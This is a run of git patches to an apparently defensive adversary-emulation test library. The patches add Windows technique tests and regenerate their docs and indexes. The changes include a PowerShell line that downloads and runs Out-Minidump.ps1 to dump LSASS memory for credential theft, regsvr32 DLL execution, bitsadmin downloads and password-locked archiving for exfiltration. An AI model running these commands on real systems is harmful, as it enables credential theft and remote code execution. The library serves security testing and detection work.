[PATCH 072/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1218.010/T1218.010.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8f7cce9c..8d4df8cf 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -37644,7 +37644,7 @@ defense-evasion: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" executor: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe - /s #{dll_name}) ELSE ( regsvr32.exe /s #{regsvr32path}\#{regsvr32name} ) + /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) ' name: command_prompt diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md index 61e97833..4bf31909 100644 --- a/atomics/T1218.010/T1218.010.md +++ b/atomics/T1218.010/T1218.010.md @@ -115,7 +115,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr ```cmd -IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{regsvr32path}\#{regsvr32name} ) +IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) ``` From 3f8e909392f9d597155374f075498eec8e0dd4d4 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Tue, 12 Jan 2021 21:22:57 -0600 Subject: [PATCH 073/131] T1560.001 prereqs tests1 2 4 (#1363) * Update T1560.001.yaml Changed Test 1 to do a silent install of winrar. Added prereqs to Test 2 to install winrar. * Update T1560.001.yaml Added prereq commands to Test 4 to download and install 7zip. * Update T1560.001.yaml changed command in test 4 to stop endlessly adding to archive new files * Update T1560.001.yaml Co-authored-by: Carrie Roberts --- atomics/T1560.001/T1560.001.yaml | 46 ++++++++++++++++++++++++++++---- 1 file changed, 41 insertions(+), 5 deletions(-) diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index 13a1b1f6..7fbee51f 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml @@ -42,8 +42,7 @@ atomic_tests: get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} - echo Follow the installer prompts to install Winrar - #{rar_installer} + #{rar_installer} /S executor: name: command_prompt @@ -60,6 +59,24 @@ atomic_tests: rar a -p"blue" hello.rar (VARIANT) supported_platforms: - windows + input_arguments: + rar_installer: + description: Winrar installer + type: Path + default: '%TEMP%\winrar.exe' + rar_exe: + description: The RAR executable from Winrar + type: Path + default: '%programfiles%/WinRAR/Rar.exe' + dependencies: + - description: | + Rar tool must be installed at specified location (#{rar_exe}) + prereq_command: | + if not exist "#{rar_exe}" (exit /b 1) + get_prereq_command: | + echo Downloading Winrar installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} + #{rar_installer} /S executor: name: command_prompt elevation_required: false @@ -67,7 +84,7 @@ atomic_tests: mkdir .\tmp\victim-files cd .\tmp\victim-files echo "This file will be encrypted" > .\encrypted_file.txt - rar a -hp"blue" hello.rar + "#{rar_exe}" a -hp"blue" hello.rar dir - name: Compress Data and lock with password for Exfiltration with winzip @@ -121,6 +138,25 @@ atomic_tests: Note: Requires 7zip installation supported_platforms: - windows + input_arguments: + 7zip_installer: + description: 7zip installer + type: Path + default: "%TEMP%\\7zip.exe" + 7zip_exe: + description: Path to installed 7zip executable + type: Path + default: "%ProgramFiles%\\7-zip\\7z.exe" + + dependencies: + - description: | + 7zip tool must be installed at specified location (#{7zip_exe}) + prereq_command: | + if not exist "#{7zip_exe}" (exit /b 1) + get_prereq_command: | + echo Downloading 7-zip installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} + #{7zip_installer} /S executor: name: command_prompt elevation_required: false @@ -128,7 +164,7 @@ atomic_tests: mkdir $PathToAtomicsFolder\T1560.001\victim-files cd $PathToAtomicsFolder\T1560.001\victim-files echo "This file will be encrypted" > .\encrypted_file.txt - 7z a archive.7z -pblue + "#{7zip_exe}" u archive.7z *txt -pblue dir - name: Data Compressed - nix - zip @@ -258,4 +294,4 @@ atomic_tests: echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip ls -l #{test_folder} cleanup_command: | - rm -Rf #{test_folder} \ No newline at end of file + rm -Rf #{test_folder} From 471d30b4f348a039c507bc0f9e823b037ac643ac Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 13 Jan 2021 03:23:42 +0000 Subject: [PATCH 074/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 51 ++++++++++++++++++++++++++++++---- atomics/T1560.001/T1560.001.md | 47 ++++++++++++++++++++++++++++--- 2 files changed, 89 insertions(+), 9 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8d4df8cf..f76be9d6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -23118,8 +23118,7 @@ collection: get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} - echo Follow the installer prompts to install Winrar - #{rar_installer} + #{rar_installer} /S executor: name: command_prompt elevation_required: false @@ -23136,6 +23135,26 @@ collection: rar a -p"blue" hello.rar (VARIANT) supported_platforms: - windows + input_arguments: + rar_installer: + description: Winrar installer + type: Path + default: "%TEMP%\\winrar.exe" + rar_exe: + description: The RAR executable from Winrar + type: Path + default: "%programfiles%/WinRAR/Rar.exe" + dependencies: + - description: 'Rar tool must be installed at specified location (#{rar_exe}) + +' + prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) + +' + get_prereq_command: | + echo Downloading Winrar installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} + #{rar_installer} /S executor: name: command_prompt elevation_required: false @@ -23143,7 +23162,7 @@ collection: mkdir .\tmp\victim-files cd .\tmp\victim-files echo "This file will be encrypted" > .\encrypted_file.txt - rar a -hp"blue" hello.rar + "#{rar_exe}" a -hp"blue" hello.rar dir - name: Compress Data and lock with password for Exfiltration with winzip auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134 @@ -23196,6 +23215,26 @@ collection: ' supported_platforms: - windows + input_arguments: + 7zip_installer: + description: 7zip installer + type: Path + default: "%TEMP%\\7zip.exe" + 7zip_exe: + description: Path to installed 7zip executable + type: Path + default: "%ProgramFiles%\\7-zip\\7z.exe" + dependencies: + - description: '7zip tool must be installed at specified location (#{7zip_exe}) + +' + prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) + +' + get_prereq_command: | + echo Downloading 7-zip installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} + #{7zip_installer} /S executor: name: command_prompt elevation_required: false @@ -23203,7 +23242,7 @@ collection: mkdir $PathToAtomicsFolder\T1560.001\victim-files cd $PathToAtomicsFolder\T1560.001\victim-files echo "This file will be encrypted" > .\encrypted_file.txt - 7z a archive.7z -pblue + "#{7zip_exe}" u archive.7z *txt -pblue dir - name: Data Compressed - nix - zip auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0 @@ -23352,7 +23391,9 @@ collection: zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./* echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip ls -l #{test_folder} - cleanup_command: 'rm -Rf #{test_folder}' + cleanup_command: 'rm -Rf #{test_folder} + +' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index ebd61861..c5559b4f 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md @@ -68,8 +68,7 @@ if not exist "#{rar_exe}" (exit /b 1) ```cmd echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} -echo Follow the installer prompts to install Winrar -#{rar_installer} +#{rar_installer} /S ``` @@ -87,6 +86,12 @@ rar a -p"blue" hello.rar (VARIANT) +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| rar_installer | Winrar installer | Path | %TEMP%\winrar.exe| +| rar_exe | The RAR executable from Winrar | Path | %programfiles%/WinRAR/Rar.exe| + #### Attack Commands: Run with `command_prompt`! @@ -95,13 +100,27 @@ rar a -p"blue" hello.rar (VARIANT) mkdir .\tmp\victim-files cd .\tmp\victim-files echo "This file will be encrypted" > .\encrypted_file.txt -rar a -hp"blue" hello.rar +"#{rar_exe}" a -hp"blue" hello.rar dir ``` +#### Dependencies: Run with `command_prompt`! +##### Description: Rar tool must be installed at specified location (#{rar_exe}) +##### Check Prereq Commands: +```cmd +if not exist "#{rar_exe}" (exit /b 1) +``` +##### Get Prereq Commands: +```cmd +echo Downloading Winrar installer +bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} +#{rar_installer} /S +``` + +
@@ -167,6 +186,12 @@ Note: Requires 7zip installation +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| 7zip_installer | 7zip installer | Path | %TEMP%\7zip.exe| +| 7zip_exe | Path to installed 7zip executable | Path | %ProgramFiles%\7-zip\7z.exe| + #### Attack Commands: Run with `command_prompt`! @@ -175,13 +200,27 @@ Note: Requires 7zip installation mkdir $PathToAtomicsFolder\T1560.001\victim-files cd $PathToAtomicsFolder\T1560.001\victim-files echo "This file will be encrypted" > .\encrypted_file.txt -7z a archive.7z -pblue +"#{7zip_exe}" u archive.7z *txt -pblue dir ``` +#### Dependencies: Run with `command_prompt`! +##### Description: 7zip tool must be installed at specified location (#{7zip_exe}) +##### Check Prereq Commands: +```cmd +if not exist "#{7zip_exe}" (exit /b 1) +``` +##### Get Prereq Commands: +```cmd +echo Downloading 7-zip installer +bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} +#{7zip_installer} /S +``` + +
From 030040bf73eb7bcb09b863af45b567e34ef0236c Mon Sep 17 00:00:00 2001 From: JimmyAstle Date: Wed, 13 Jan 2021 14:11:12 -0500 Subject: [PATCH 075/131] Out minidump (#1368) * Adding a test of Out-Minidump.ps1 Adding in a credential dumping test that leverages Out-Minidump.ps1 to dump the contents of lsass to disk for offline extraction * Fixing cleanup path Path is actually %TEMP% Co-authored-by: jimmy astle --- atomics/T1003.001/T1003.001.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 22aacb82..f4f6e00a 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -233,3 +233,17 @@ atomic_tests: pypykatz live lsa name: command_prompt elevation_required: true +- name: Dump LSASS.exe Memory using Out-Minidump.ps1 + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure + powershell implementation that leverages the MiniDumpWriteDump Win32 API call. + Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + supported_platforms: + - windows + executor: + command: | + IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump + cleanup_command: | + Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore + name: powershell + elevation_required: true \ No newline at end of file From 06ce6b9f114140645bd784e1316c76e5fc01aac1 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 13 Jan 2021 19:11:27 +0000 Subject: [PATCH 076/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.001/T1003.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index f4f6e00a..2c7a049f 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -234,6 +234,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 + auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781 description: | The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 1ef686ab..82429aa0 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -652,3 +652,4 @@ c2969434-672b-4ec8-8df0-bbb91f40e250 a19ee671-ed98-4e9d-b19c-d1954a51585a 6aa58451-1121-4490-a8e9-1dada3f1c68c ec3a835e-adca-4c7c-88d2-853b69c11bb9 +6502c8f0-b775-4dbd-9193-1298f56b6781 From be8d3644f2b275fb21119df9363a3ea3fd2e23f8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 13 Jan 2021 19:11:35 +0000 Subject: [PATCH 077/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 18 +++++++++++ atomics/T1003.001/T1003.001.md | 32 +++++++++++++++++++ 6 files changed, 54 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index c1f6cbc1..3c6c0c1c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -214,6 +214,7 @@ credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct sy credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt +credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c1bcace7..4998660b 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -22,6 +22,7 @@ credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct sy credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt +credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 9fe88826..45b3707f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -436,6 +436,7 @@ - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows] - Atomic Test #6: Offline Credential Theft With Mimikatz [windows] - Atomic Test #7: LSASS read with pypykatz [windows] + - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 25ff7cac..6aaddcbc 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -46,6 +46,7 @@ - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows] - Atomic Test #6: Offline Credential Theft With Mimikatz [windows] - Atomic Test #7: LSASS read with pypykatz [windows] + - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f76be9d6..632f88fe 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -20494,6 +20494,24 @@ credential-access: ' name: command_prompt elevation_required: true + - name: Dump LSASS.exe Memory using Out-Minidump.ps1 + auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781 + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure + powershell implementation that leverages the MiniDumpWriteDump Win32 API call. + Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + supported_platforms: + - windows + executor: + command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1''); + get-process lsass | Out-Minidump + +' + cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore + +' + name: powershell + elevation_required: true T1557: technique: external_references: diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 1b02e62b..2ac5c0dc 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -40,6 +40,8 @@ The following SSPs can be used to access credentials: - [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz) +- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1) +
@@ -379,4 +381,34 @@ pip3 install pypykatz +
+
+ +## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1 +The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure +powershell implementation that leverages the MiniDumpWriteDump Win32 API call. +Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump +``` + +#### Cleanup Commands: +```powershell +Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore +``` + + + + +
From 5c52612858bbdc0e95ceeff459cde3426489388f Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 13 Jan 2021 12:12:24 -0700 Subject: [PATCH 078/131] added details to the description (#1366) Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com> --- atomics/T1127.001/T1127.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1127.001/T1127.001.yaml b/atomics/T1127.001/T1127.001.yaml index bfa8383d..3d6232f3 100644 --- a/atomics/T1127.001/T1127.001.yaml +++ b/atomics/T1127.001/T1127.001.yaml @@ -4,7 +4,7 @@ atomic_tests: - name: MSBuild Bypass Using Inline Tasks auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93 description: | - Executes the code in a project file using. C# Example + Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. supported_platforms: - windows input_arguments: From fca809efa6318e1b6d4cc92d7006fd0dd6f5317b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 13 Jan 2021 19:12:56 +0000 Subject: [PATCH 079/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 +++- atomics/T1127.001/T1127.001.md | 2 +- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 632f88fe..9780bd31 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -33481,7 +33481,9 @@ defense-evasion: atomic_tests: - name: MSBuild Bypass Using Inline Tasks auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93 - description: 'Executes the code in a project file using. C# Example + description: 'Executes the code in a project file using msbuild.exe. The default + C# project example file (T1127.001.csproj) will simply print "Hello From a + Code Fragment" and "Hello From a Class." to the screen. ' supported_platforms: diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md index 3739b39d..078d1871 100644 --- a/atomics/T1127.001/T1127.001.md +++ b/atomics/T1127.001/T1127.001.md @@ -12,7 +12,7 @@ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline t
## Atomic Test #1 - MSBuild Bypass Using Inline Tasks -Executes the code in a project file using. C# Example +Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. **Supported Platforms:** Windows From 1f26ebdb6c2613cf99cd6621b6d0269a86257a39 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 13 Jan 2021 12:14:14 -0700 Subject: [PATCH 080/131] typo corrections (#1367) addresses issues #1365 Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com> --- atomics/T1197/T1197.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index dda00692..c7317d0b 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -84,10 +84,10 @@ atomic_tests: cleanup_command: | del #{local_file} >nul 2>&1 name: command_prompt -- name: Bits download using destktopimgdownldr.exe (cmd) +- name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 description: | - This test simulates using destopimgdwnldr.exe to download a malicious file + This test simulates using desktopimgdownldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ From bc705cb7aaa5f26f2d96585fac8e4c7052df0ff9 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 13 Jan 2021 19:14:46 +0000 Subject: [PATCH 081/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 4 ++-- atomics/Indexes/Indexes-CSV/windows-index.csv | 4 ++-- atomics/Indexes/Indexes-Markdown/index.md | 4 ++-- .../Indexes/Indexes-Markdown/windows-index.md | 4 ++-- atomics/Indexes/index.yaml | 20 +++++++++---------- atomics/T1197/T1197.md | 6 +++--- 6 files changed, 21 insertions(+), 21 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 3c6c0c1c..df220089 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -108,7 +108,7 @@ persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-92 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt -persistence,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt +persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual @@ -278,7 +278,7 @@ defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C# defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt -defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt +defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 4998660b..78e97a21 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -137,7 +137,7 @@ defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C# defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt -defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt +defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt @@ -330,7 +330,7 @@ 